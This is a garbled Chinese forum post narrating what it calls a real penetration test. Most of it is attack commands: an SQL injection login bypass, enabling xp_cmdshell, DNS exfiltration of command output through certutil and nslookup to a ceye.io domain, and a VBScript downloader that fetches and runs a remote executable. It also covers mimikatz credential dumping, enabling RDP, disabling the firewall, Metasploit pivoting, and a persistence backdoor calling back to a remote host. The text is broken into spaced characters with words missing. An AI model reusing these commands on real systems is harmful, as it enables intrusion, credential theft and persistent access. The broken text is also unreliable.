[28404] 2020-07-10_【渗透技术分享】记一次渗透实战

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-07-10_【渗透技术分享】记一次渗透实战 - l 3 y x   O t s   2 0 2 0 - 0 7 - 1 0 d i r s e a r c h 西   i p 访 c d n     s u b D o m a i n s B r u t e     C D N i p     i p n m a p 8 0 9 9 访 W E B   n m a p   n m a p 8 0 9 9 w e b
    a d m i n / a d m i n   l 3 y x / x x x x   a d m i n ( a d m i n ' / 1 2 3 1 2 3 )   s q l i " " a d m i n / x '   o r   ' x ' = ' x - -     w h e r e   u s e r n a m e = x x x   a n d   p a s s w o r d = x x x   s q l   e x e c u t e   @ r e s u l t =   v e r i f y   ' x x x ' , ' x x x ' ; a d m i n / 1 1 ' , ' x x ' - -
s q l s e r v e r 使 p a y l o a d s q l s e r v e r s q l s q l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,     1 ; R E C O N F I G U R E ; e x e c   m a s t e r . . x p _ c m d s h e l l   " w h o a m i " p i n g   D N S   D N S D n s l o o k u p p i n g & & W E B t e m p s q l s e r v e r   p a y l a o d s y s t e m c m d   / v   / c   " w h o a m i   >   t e m p   & &   c e r t u t i l   - e n c o d e   t e m p   t e m p 2   & &   f i n d s t r   / L   / V   " C E R T I F I C A T E "   t e m p 2   >   t e m p 3   & &   s e t   / p   M Y V A R = <   t e m p 3   & &   s e t   F I N A L = ! M Y V A R ! . x x x . c e y e . i o   & &   n s l o o k u p   ! F I N A L ! " e x e c   m a s t e r . . x p _ c m d s h e l l     " w h o a m i > D : / t e m p % 2 6 % 2 6 c e r t u t i l   - e n c o d e   D : / t e m p   D : / t e m p 2 % 2 6 % 2 6 f i n d s t r   / L   / V   " " C E R T I F I C A T E " "   D : / t e m p 2 > D : / t e m p 3 " ; e x e c   m a s t e r . . x p _ c m d s h e l l     " c m d   / v   / c " " s e t   / p   M Y V A R = <   D : / t e m p 3   % 2 6 % 2 6   s e t   F I N A L = ! M Y V A R ! . x x x . c e y e . i o   % 2 6 % 2 6   p i n g   ! F I N A L ! " " " ; e x e c   m a s t e r . . x p _ c m d s h e l l     " d e l   " " D : / t e m p " "   " " D : / t e m p 2 " "   " " D : / t e m p 3 " " " ;
  V B S c m d 使 p o w e r s h e l l p o w e r s h e l l v b s v b s : : c s c r i p t   D : / l . v b s   h t t p : / / x x . x x . x x . x x / x . e x e   D : / x . e x e s q l & &   1 2 8 s q l s e r v e r   c s c r i p t   D : / l . v b s   h t t p : / / i p / x . e x e   D : / x . e x e   v b s   D : / x . e x e   s h e l l 怀 . . . 3 2 6 4 p a y l o a d 3 2 s h e l l i L o c a l   =   L C a s e ( W S c r i p t . A r g u m e n t s ( 1 ) ) i R e m o t e   =   L C a s e ( W S c r i p t . A r g u m e n t s ( 0 ) ) S e t   x P o s t   =   C r e a t e O b j e c t ( " M i c r o s o f t . X M L H T T P " ) x P o s t . O p e n   " G E T " , i R e m o t e , 0 x P o s t . S e n d ( ) S e t   s G e t   =   C r e a t e O b j e c t ( " A D O D B . S t r e a m " ) s G e t . M o d e   =   3 s G e t . T y p e   =   1 s G e t . O p e n ( ) s G e t . W r i t e ( x P o s t . r e s p o n s e B o d y ) s G e t . S a v e T o F i l e   i L o c a l , 2 e c h o   i L o c a l   =   L C a s e ( W S c r i p t . A r g u m e n t s ( 1 ) ) > D : / l . v b s e c h o   i R e m o t e   =   L C a s e ( W S c r i p t . A r g u m e n t s ( 0 ) ) > > D : / l . v b s e c h o   S e t   x P o s t   =   C r e a t e O b j e c t ( " " M i c r o s o f t . X M L H T T P " " ) > > D : / l . v b s e c h o   x P o s t . O p e n   " " G E T " " , i R e m o t e , 0   > > D : / l . v b s e c h o   x P o s t . S e n d ( )   > > D : / l . v b s e c h o   S e t   s G e t   =   C r e a t e O b j e c t ( " " A D O D B . S t r e a m " " ) > > D : / l . v b s e c h o   s G e t . M o d e   =   3   > > D : / l . v b s e c h o   s G e t . T y p e   =   1   > > D : / l . v b s e c h o   s G e t . O p e n ( ) > > D : / l . v b s e c h o   s G e t . W r i t e ( x P o s t . r e s p o n s e B o d y ) > > D : / l . v b s e c h o   s G e t . S a v e T o F i l e   i L o c a l , 2   > > D : / l . v b s
  i p   c h c p   6 5 0 0 1 U T F - 8 U T F - 8   s h e l l u t f - 8 c h c p   4 3 7 I B M 4 3 7     3 3 8 9 i p c o n f i g n e t   g r o u p   / d o m a i n s y s t e m i n f o n e t s t a t   - a n o
  I P h a s h m i m i k a t z m e t a s p l o i t k e r b e r o s m i m i k a t z _ c o m m a n d m i m i k a t z   3 3 8 9 3 3 8 9 W i n 7 W i n 2 0 0 3 X P a r p   a l o a d   m i m i k a t z m i m i k a t z _ c o m m a n d   - f   s e k u r l s a : : l o g o n P a s s w o r d s R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l "   " S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f
: 3 3 8 9 c l o s e d . . . m e t a s p l o i t : ( - r   1 9 2 . 1 6 8 . 5 0 . 2 ) 3 3 8 9 ( - p   3 3 8 9 ) 3 3 8 9 ( - l   3 3 8 9 ) i p i p 3 3 8 9 n e t s h   f i r e w a l l   s e t   o p m o d e   m o d e = d i s a b l e p o r t f w d   a d d   - l   3 3 8 9   - p   3 3 8 9   - r   1 9 2 . 1 6 8 . 5 0 . 2
  使 m e t a s p l o i t p o r t s c a n   m e t a s p l o i   M e t s v c 使 r u n   a u t o r o u t e   - s   1 9 2 . 1 6 8 . 5 0 . 2 / 2 4 u s e   a u x i l i a r y / s c a n n e r / p o r t s c a n / t c p s e t   r h o s t s   1 9 2 . 1 6 8 . 5 0 . 2 / 2 4 s e t   p o r t s   1 3 9 ,   4 4 5 e x p l o i t r u n   m e t s v c
使 e x p l o i t / m u l t i / h a n d l e r p a y l o a d w i n d o w s / m e t s v c _ b i n d _ t c p i p 3 1 3 3 7   m e t a s p l o i   P e r s i s t e n c e - U H K C U S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n R u n - i - p - r i p   m e t e r p r e t e r r u n   p e r s i s t e n c e   - U   - i   6 0   - p   5 5 5 5   - r   x x . x x . x x . x x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则